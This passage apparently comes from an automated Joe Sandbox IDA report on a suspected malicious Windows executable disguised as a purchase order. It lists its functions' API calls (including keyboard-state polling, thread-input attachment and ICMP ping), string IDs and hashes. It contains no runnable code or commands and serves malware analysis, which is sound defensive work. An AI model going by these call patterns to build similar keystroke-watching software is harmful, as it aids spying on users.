                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __itow__swprintf_xtow@16
                        • String ID: %.15g$0x%p$False$True
                        • API String ID: 1502193981-2263619337
                        • Opcode ID: 5db6ec32781d803fc3aa91d2475b07539159d6c9a4d8bacb88cc31ff34e53fc1
                        • Instruction ID: 9e7924218992692a319be8fe60e01aa1817441c7e710fb603299d4738b1b9b3e
                        • Opcode Fuzzy Hash: 5db6ec32781d803fc3aa91d2475b07539159d6c9a4d8bacb88cc31ff34e53fc1
                        • Instruction Fuzzy Hash: 11412432520605DBDB25DF38D841FAAB7E9BB44350F30446AE54ED7291EA71DA51CF10
                        APIs
                        • _memset.LIBCMT ref: 002D5CCA
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        • __gmtime64_s.LIBCMT ref: 002D5D63
                        • __gmtime64_s.LIBCMT ref: 002D5D99
                        • __gmtime64_s.LIBCMT ref: 002D5DB6
                        • __allrem.LIBCMT ref: 002D5E0C
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D5E28
                        • __allrem.LIBCMT ref: 002D5E3F
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D5E5D
                        • __allrem.LIBCMT ref: 002D5E74
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D5E92
                        • __invoke_watson.LIBCMT ref: 002D5F03
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                        • String ID:
                        • API String ID: 384356119-0
                        • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                        • Instruction ID: 7e3b79a1162d7f27a7b310ba47fb224f17e940d7c81ccc2e6b95a8c10a8a4210
                        • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                        • Instruction Fuzzy Hash: 8B71F871A21F27ABD714EE79CC41B6AB3A8AF04324F14412BF514D7781E7B0DE608B90
                        APIs
                        • _memset.LIBCMT ref: 002F5816
                        • GetMenuItemInfoW.USER32(003718F0,000000FF,00000000,00000030), ref: 002F5877
                        • SetMenuItemInfoW.USER32(003718F0,00000004,00000000,00000030), ref: 002F58AD
                        • Sleep.KERNEL32(000001F4), ref: 002F58BF
                        • GetMenuItemCount.USER32(?), ref: 002F5903
                        • GetMenuItemID.USER32(?,00000000), ref: 002F591F
                        • GetMenuItemID.USER32(?,-00000001), ref: 002F5949
                        • GetMenuItemID.USER32(?,?), ref: 002F598E
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002F59D4
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F59E8
                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F5A09
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                        • String ID:
                        • API String ID: 4176008265-0
                        • Opcode ID: 50975382fb68bde7001c28962e1ec1dcfbf14a5fe1aea2e33235a59934e7ba50
                        • Instruction ID: 7f1426c04d1604ebc07743986651c0a10c8b460d3a600acbd5b25071d2230b27
                        • Opcode Fuzzy Hash: 50975382fb68bde7001c28962e1ec1dcfbf14a5fe1aea2e33235a59934e7ba50
                        • Instruction Fuzzy Hash: 1C61C47192066EEFEB15CF64D888ABEBBB8EB05394F140129F741A3251D7709D61CF60
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00319AA5
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00319AA8
                        • GetWindowLongW.USER32(?,000000F0), ref: 00319ACC
                        • _memset.LIBCMT ref: 00319ADD
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00319AEF
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00319B67
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow_memset
                        • String ID:
                        • API String ID: 830647256-0
                        • Opcode ID: 1f512bf74addb357036c21ffed35d59d3191f83b7738a4388fed0a809c1007fe
                        • Instruction ID: b7f95d7f749ab2e60d78b527aa9a30a75a408c3ad5acd1b7cea15bf8e6c9156e
                        • Opcode Fuzzy Hash: 1f512bf74addb357036c21ffed35d59d3191f83b7738a4388fed0a809c1007fe
                        • Instruction Fuzzy Hash: 6F615D75900208AFDB26DFA8CC91FEE77F8AF09700F14415AFA15A7291D770A985DB90
                        APIs
                        • GetKeyboardState.USER32(?), ref: 002F3591
                        • GetAsyncKeyState.USER32(000000A0), ref: 002F3612
                        • GetKeyState.USER32(000000A0), ref: 002F362D
                        • GetAsyncKeyState.USER32(000000A1), ref: 002F3647
                        • GetKeyState.USER32(000000A1), ref: 002F365C
                        • GetAsyncKeyState.USER32(00000011), ref: 002F3674
                        • GetKeyState.USER32(00000011), ref: 002F3686
                        • GetAsyncKeyState.USER32(00000012), ref: 002F369E
                        • GetKeyState.USER32(00000012), ref: 002F36B0
                        • GetAsyncKeyState.USER32(0000005B), ref: 002F36C8
                        • GetKeyState.USER32(0000005B), ref: 002F36DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: e773353197fa5dbfb39417b61e420ec104d84e2d062f8608931c9c91a15ff2f1
                        • Instruction ID: 02b2d1f197e3a137219b8981557de95af50b36536833895a37aa1e91b9b27aea
                        • Opcode Fuzzy Hash: e773353197fa5dbfb39417b61e420ec104d84e2d062f8608931c9c91a15ff2f1
                        • Instruction Fuzzy Hash: 1941B3605147CE7DFF31CE7484143B5FAA86B153C4F444069D7C6862C2EBA49BE88B6A
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 002EA2AA
                        • SafeArrayAllocData.OLEAUT32(?), ref: 002EA2F5
                        • VariantInit.OLEAUT32(?), ref: 002EA307
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 002EA327
                        • VariantCopy.OLEAUT32(?,?), ref: 002EA36A
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 002EA37E
                        • VariantClear.OLEAUT32(?), ref: 002EA393
                        • SafeArrayDestroyData.OLEAUT32(?), ref: 002EA3A0
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002EA3A9
                        • VariantClear.OLEAUT32(?), ref: 002EA3BB
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002EA3C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        • Opcode ID: 37267096327d6b5faa9c7631a0059bed3cbe4b8e53c3ee740a06cddd805ff08b
                        • Instruction ID: d07d819b30041cb2be771aa277d2324a86f94ac8a05faeefa62c6feeabc95961
                        • Opcode Fuzzy Hash: 37267096327d6b5faa9c7631a0059bed3cbe4b8e53c3ee740a06cddd805ff08b
                        • Instruction Fuzzy Hash: E8412A31910219AFDB01DFA6E8889DEBFB9FF48344F408065F901A7261DB74AA55CBA1
                        APIs
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • CoInitialize.OLE32 ref: 0030B298
                        • CoUninitialize.OLE32 ref: 0030B2A3
                        • CoCreateInstance.OLE32(?,00000000,00000017,0033D8FC,?), ref: 0030B303
                        • IIDFromString.OLE32(?,?), ref: 0030B376
                        • VariantInit.OLEAUT32(?), ref: 0030B410
                        • VariantClear.OLEAUT32(?), ref: 0030B471
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        • API String ID: 834269672-1287834457
                        • Opcode ID: 423c06f5d3312335ebde9eea5ae0329b4d0c73471be4ec50a96730bf58081ad8
                        • Instruction ID: f09280d70d0a3609675d434801fe017b21a18d7512400c0ad303592db6917d24
                        • Opcode Fuzzy Hash: 423c06f5d3312335ebde9eea5ae0329b4d0c73471be4ec50a96730bf58081ad8
                        • Instruction Fuzzy Hash: 6E61A930205301AFC712DF64C895BAEF7E8AF88754F14495DF9859B292CB70EE48CB92
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 003086F5
                        • inet_addr.WSOCK32(?,?,?), ref: 0030873A
                        • gethostbyname.WSOCK32(?), ref: 00308746
                        • IcmpCreateFile.IPHLPAPI ref: 00308754
                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003087C4
                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003087DA
                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0030884F
                        • WSACleanup.WSOCK32 ref: 00308855
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                        • String ID: Ping
                        • API String ID: 1028309954-2246546115
                        • Opcode ID: 261fe790d48ce1f30c4bf9ec50f359cbc936a85b6451c5743a2d5c56dc766944
                        • Instruction ID: 04b522a31da2e466e1ddbd85c35b13ab8e8609f46591a1c11ebb0587f38574f6
                        • Opcode Fuzzy Hash: 261fe790d48ce1f30c4bf9ec50f359cbc936a85b6451c5743a2d5c56dc766944
                        • Instruction Fuzzy Hash: AB51A1316042019FDB12EF24CC95B6ABBE8AF48760F15892AF5969B2E1DB70EC10CF41
                        APIs
                        • _memset.LIBCMT ref: 00319C68
                        • CreateMenu.USER32 ref: 00319C83
                        • SetMenu.USER32(?,00000000), ref: 00319C92
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00319D1F
                        • IsMenu.USER32(?), ref: 00319D35
                        • CreatePopupMenu.USER32 ref: 00319D3F
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00319D70
                        • DrawMenuBar.USER32 ref: 00319D7E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                        • String ID: 0
                        • API String ID: 176399719-4108050209
                        • Opcode ID: 8fe37f26c27f989fa3619c3cbc209c9a047675d3216b9445d7842d971b5bbdac
                        • Instruction ID: 53714ff63f7ab6a2d666e8717694fa1d21c77b0e0c310599c73a5710cdecbedb
                        • Opcode Fuzzy Hash: 8fe37f26c27f989fa3619c3cbc209c9a047675d3216b9445d7842d971b5bbdac
                        • Instruction Fuzzy Hash: 50418B75A00209EFEB26EF68E894BDA7BB9FF49304F150059E94597361D730A950CF60
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 002FEC1E
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002FEC94
                        • GetLastError.KERNEL32 ref: 002FEC9E
                        • SetErrorMode.KERNEL32(00000000,READY), ref: 002FED0B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: 232c8e467fed5da4e93abe6719a66772317ddf56b32ede39e0abccc404af89a2
                        • Instruction ID: 63585e4899666dc94f4070722b51a7d3cb3ad693b2cfb7ad976742485ec313e5
                        • Opcode Fuzzy Hash: 232c8e467fed5da4e93abe6719a66772317ddf56b32ede39e0abccc404af89a2
                        • Instruction Fuzzy Hash: 0231B235A1020A9FCB12EF64D945AFEF7B8EF44780F118036F606DB2A1DB719951CB91
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002EC782
                        • GetDlgCtrlID.USER32 ref: 002EC78D
                        • GetParent.USER32 ref: 002EC7A9
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002EC7AC
                        • GetDlgCtrlID.USER32(?), ref: 002EC7B5
                        • GetParent.USER32(?), ref: 002EC7D1
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 002EC7D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 313823418-1403004172
                        • Opcode ID: 0a0d2907fdd5b46cb60782b52908c44845d8497ade2f8638bfd535192f273fa6
                        • Instruction ID: 28d046e6a1aee9d9fdcc65c8c97ff67a9e442cb360fd1fff956bce8140be6ab8
                        • Opcode Fuzzy Hash: 0a0d2907fdd5b46cb60782b52908c44845d8497ade2f8638bfd535192f273fa6
                        • Instruction Fuzzy Hash: BB21E070950208AFCF05ABA0CC82EFEBB69EB46300F604115F562972D1DBB45826AF20
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002EC869
                        • GetDlgCtrlID.USER32 ref: 002EC874
                        • GetParent.USER32 ref: 002EC890
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 002EC893
                        • GetDlgCtrlID.USER32(?), ref: 002EC89C
                        • GetParent.USER32(?), ref: 002EC8B8
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 002EC8BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 313823418-1403004172
                        • Opcode ID: 332816dc10b43ffe4caf732d229bb11b1ef2cfd32731d9e4f11a83c374ec9cfa
                        • Instruction ID: 2abe9c4582647dc0f49c6994c65ad7b5a0b815195be36dcfacda9883c276658d
                        • Opcode Fuzzy Hash: 332816dc10b43ffe4caf732d229bb11b1ef2cfd32731d9e4f11a83c374ec9cfa
                        • Instruction Fuzzy Hash: FE21A171950208ABDF06EFA5CC96EFEBB69EF45300F604015F551A7191DBB45826AB20
                        APIs
                        • GetParent.USER32 ref: 002EC8D9
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 002EC8EE
                        • _wcscmp.LIBCMT ref: 002EC900
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002EC97B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClassMessageNameParentSend_wcscmp
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 1704125052-3381328864
                        • Opcode ID: 368bc81be16c16884885004eeed9d6880c2c6e0d9119043c45070587437752d9
                        • Instruction ID: 973d7a4707ede77f5f6c33747664689f42879e2465d90876526c14e7895bd967
                        • Opcode Fuzzy Hash: 368bc81be16c16884885004eeed9d6880c2c6e0d9119043c45070587437752d9
                        • Instruction Fuzzy Hash: 8911E3762A8743BAFA052A71AC0BCB6679CDB06364B700023F910A60D7FBA169334954
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 0030B777
                        • CoInitialize.OLE32(00000000), ref: 0030B7A4
                        • CoUninitialize.OLE32 ref: 0030B7AE
                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0030B8AE
                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 0030B9DB
                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0030BA0F
                        • CoGetObject.OLE32(?,00000000,0033D91C,?), ref: 0030BA32
                        • SetErrorMode.KERNEL32(00000000), ref: 0030BA45
                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0030BAC5
                        • VariantClear.OLEAUT32(0033D91C), ref: 0030BAD5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                        • String ID:
                        • API String ID: 2395222682-0
                        • Opcode ID: a1fd967d2f7cbe0c926d3b09caa33cb5b1df7b6fb35011facf71e760d725d9dd
                        • Instruction ID: f4ad07ec1664fc5d3383cedc7f068c668dbaf98074dac835361b1ec829b2293b
                        • Opcode Fuzzy Hash: a1fd967d2f7cbe0c926d3b09caa33cb5b1df7b6fb35011facf71e760d725d9dd
                        • Instruction Fuzzy Hash: 41C11271608345AFC701DF68C894A6AB7E9FF88344F10491DF98A9B2A1DB71ED05CB92
                        APIs
                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 002FB137
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ArraySafeVartype
                        • String ID:
                        • API String ID: 1725837607-0
                        • Opcode ID: 0ad6f5323a945903a18979b9727aadeb86c951ba8d7d5c21e164f2cfbeef1505
                        • Instruction ID: 579887f3b574eb283bdf5b1fb24b962bb1fe38f1ac19c08bd536f16aafb44223
                        • Opcode Fuzzy Hash: 0ad6f5323a945903a18979b9727aadeb86c951ba8d7d5c21e164f2cfbeef1505
                        • Instruction Fuzzy Hash: 60C18975A2021ADFDB02CF98D481BBEB7B4EF08355F20407AE605E7291C774AA95CF90
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 002F4A7D
                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4A91
                        • GetWindowThreadProcessId.USER32(00000000), ref: 002F4A98
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4AA7
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 002F4AB9
                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4AD2
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4AE4
                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4B29
                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4B3E
                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002F3AD7,?,00000001), ref: 002F4B49
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
